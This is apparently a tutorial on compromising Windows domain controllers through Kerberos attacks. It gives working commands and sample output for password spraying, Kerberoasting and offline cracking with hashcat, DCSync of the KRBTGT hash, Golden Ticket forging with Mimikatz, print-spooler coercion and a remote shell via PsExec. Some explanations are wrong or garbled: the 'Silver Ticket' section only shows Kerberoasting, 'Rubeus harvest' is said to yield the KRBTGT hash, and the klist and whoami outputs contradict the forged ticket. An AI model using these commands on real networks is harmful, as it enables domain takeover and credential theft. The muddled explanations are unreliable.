Mastering Domain Controller Exploitation: Kerberoast, Silver Tickets, and Golden Tickets
Domain Controllers are critical components of Windows Active Directory and are targeted by attackers seeking sensitive information or network control. Techniques covered include Kerberoasting, Silver Tickets, and Golden Tickets.
Kerberoasting Attack: Extracting Encrypted Kerberos Tickets
Kerberoasting is a common attack technique used to extract encrypted Kerberos tickets from a domain controller and crack them offline to obtain plaintext passwords. The attack involves requesting a service ticket for a specific user account with a known service principal name (SPN) and then extracting the encrypted ticket from the response. The extracted ticket can then be cracked using password cracking tools like Hashcat.
Assuming the targeted user account is “jsmith” and we have a list of potential passwords in a file called “passwords.txt”:
$ kerbrute spray --dc dc.example.com --user jsmith --passwords passwords.txt --domain example.com
[+] Valid credentials found:
User : jsmith
Password : Password1
Kerbrute is an open-source tool that can be used to perform brute-force password spraying attacks against Active Directory user accounts. By spraying a large list of common passwords against a list of targeted user accounts, an attacker can potentially obtain access to one or more accounts with weak passwords.
$ python GetUserSPNs.py domain/username:password -dc-ip 192.168.1.1 -request
ServicePrincipalName Name MemberOf PasswordLastSet
--------------------------- ---------- -------------------------------------------------------- ---------------------------
MSSQLSvc/server.domain.local ACCOUNT1 CN=Group1,CN=Users,DC=domain,DC=local 2020-09-15 15:37:38.123456
MSSQLSvc/server.domain.local ACCOUNT2 CN=Group2,CN=Users,DC=domain,DC=local 2020-09-10 09:53:23.345678
HOST/server.domain.local ACCOUNT3 CN=Group3,CN=Users,DC=domain,DC=local 2021-01-05 12:45:12.987654
Silver Ticket Attack: Generating Forged Kerberos Tickets with Rubeus.exe and Hashcat
A Silver Ticket attack is a technique that allows an attacker to forge a Service Ticket (TGS) for a specific service without having to know the user’s password. This type of attack is useful when an attacker has limited access to the target network but has the necessary privileges to create a Service Principal Name (SPN) for a specific service.
Rubeus is a popular tool used for performing Kerberos-based attacks against Active Directory environments. One of its features is the ability to perform a Kerberoasting attack, which involves requesting and extracting the hash of a user’s service principal name (SPN) from the domain controller. This hash can then be used in offline attacks to crack the password and gain access to the user’s account.
Use Rubeus.exe to generate a Silver Ticket for a specific service account:
$ Rubeus.exe kerberoast /simple /outfile:hashes.txt
[*] Action: Kerberoasting
[*] Using rc4_hmac encryption
[+] Requesting hash for SPN MSSQLSvc/sqlserver.example.com:1433... (this may take a while)
[+] Hash collected for MSSQLSvc/sqlserver.example.com:1433
[+] Saved Kerberoast output to hashes.txt
Rubeus has successfully performed a Kerberoasting attack against the SPN MSSQLSvc/sqlserver.example.com:1433 and saved the resulting hash to the file “hashes.txt”.
$ hashcat -m 13100 -a 0 hashes.txt rockyou.txt
hashcat (v6.2.4) starting...
[...]
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5 TGS-REP etype 23
Hash.Target......: [email protected]:1433$55b73c9d2cfe98a3...faa3
Time.Started.....: Tue Apr 12 16:27:36 2023 (1 sec)
Time.Estimated...: Tue Apr 12 16:27:37 2023 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 9317.2 kH/s (8.75ms) @ Accel:32 Loops:64 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4096/14344384 (0.03%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-64
Candidates.#1....: dragonfly -> Erika1
[...]
[email protected]:1433$55b73c9d2cfe98a36f8bfb202818a06c$465e1c34e7b10d372373f56cde3d6cfe5276b54fb6b86983d66a94a336a2a2b30ffce77ac1a0d600c9654070fd2faa3:password123The “hashes.txt” file, generated through the “Rubeus.exe kerberoast” command, contained a Kerberos hash for a user’s Service Principal (SPN). Then, using the “hashcat” tool and a password dictionary (“rockyou.txt”), the hash was cracked and the password associated with the SPN was discovered to be “password123”. With this password, an attacker could potentially authenticate as the user associated with the SPN and gain access to sensitive resources.
Golden Ticket Attack: Exploiting Kerberos with Mimikatz, Rubeus, and ms-rprn.exe
In a Golden Ticket attack, an attacker can forge a Kerberos Ticket Granting Ticket (TGT) for any domain account, giving them full access to a network’s resources. This type of attack requires access to the domain controller’s KRBTGT account password hash.
The command “.\ms-rprn.exe \dc.example.local \workstation.example.local” is invoking the ms-rprn tool to perform a printer spooler service impersonation attack. This attack allows an attacker to impersonate a printer spooler service and gain access to sensitive information, such as hashes, on a remote machine. In this case, the command is targeting a domain controller (“dc.example.local”) and a workstation (“workstation.example.local”). However, the actual result of the command will depend on the specific configuration of the target system.
.\ms-rprn.exe \\dc.example.local \\workstation.example.local
Rubeus can perform a Golden Ticket attack. The following command can be used to obtain the KRBTGT account password hash:
Rubeus.exe harvest /interval:30 /nowrap
Mimikatz is a popular tool used for Golden Ticket attacks. The following command can be used to obtain the KRBTGT account password hash:
mimikatz.exe "lsadump::dcsync /user:krbtgt"
Once the hash has been obtained, it can be used to create a forged TGT with Mimikatz:
mimikatz # kerberos::golden /domain:contoso.com /sid:S-1-5-21-3623811015-3361044348-30300820 /rc4:1d2d8c99f64f27e7cfa863e37e56b971 /user:Administrator /id:500 /target:krbtgt /service:cifs /ptt
User : admin\Administrator
Domain : example.com (example)
SID : S-1-5-21-3623811015-3361044348-30300820
krbtgt : yes
Ticket : 0x8d600001b6c04200e0000000000...
Start : 05/01/2023 13:40:16 (UTC)
End : 05/02/2023 13:40:16 (UTC)
Renew : 05/08/2023 13:40:16 (UTC)
Flags : name_canonicalize, pre_authent, renewable, forwardable
Keys : aes256_hmac, aes128_hmac, rc4_hmac_nt
The “klist” command is used to display Kerberos ticket information, including the ticket owner, ticket expiration time, and ticket encryption type. It can also be used to purge tickets from the current user’s ticket cache. This command is often used in combination with other tools, such as Mimikatz, to dump and manipulate Kerberos tickets in order to conduct various attacks, including Golden Ticket attacks.
We can see the token is loaded into the memory or not.
>klist
Current LogonId is 0:0x12345
Cached Tickets: (5)
#0> Client: alice @ EXAMPLE.COM
Server: krbtgt/EXAMPLE.COM @ EXAMPLE.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 4/6/2023 13:30:00 (local)
End Time: 4/7/2023 1:30:00 (local)
Renew Time: 4/13/2023 13:30:00 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
#1> Client: alice @ EXAMPLE.COM
Server: host/server1.example.com @ EXAMPLE.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 4/6/2023 13:30:00 (local)
End Time: 4/7/2023 1:30:00 (local)
Renew Time: 4/13/2023 13:30:00 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
The “ps-exec.exe \dc.example.local cmd” command is used to start a command prompt shell on a remote Windows computer named “dc.example.local” using the PsExec tool from the Sysinternals Suite.
> .\ps-exec.exe \\dc.example.local cmd
PsExec v2.34 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Starting cmd on dc.example.local...
C:\Windows\System32> whoami
krbtgt\Administrator
cmd exited on dc.example.local with error code 0.